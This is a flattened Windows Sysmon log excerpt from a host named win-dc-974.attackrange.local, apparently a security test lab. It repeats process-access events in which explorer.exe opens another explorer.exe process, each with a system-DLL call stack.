16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235770Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235769Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235768Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235767Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235766Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235765Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235764Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235763Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235762Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235761Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235760Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235759Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235758Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235757Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235756Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235755Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235754Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235753Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235752Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235751Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235750Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235749Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235748Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235747Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235746Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235745Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235744Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235743Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 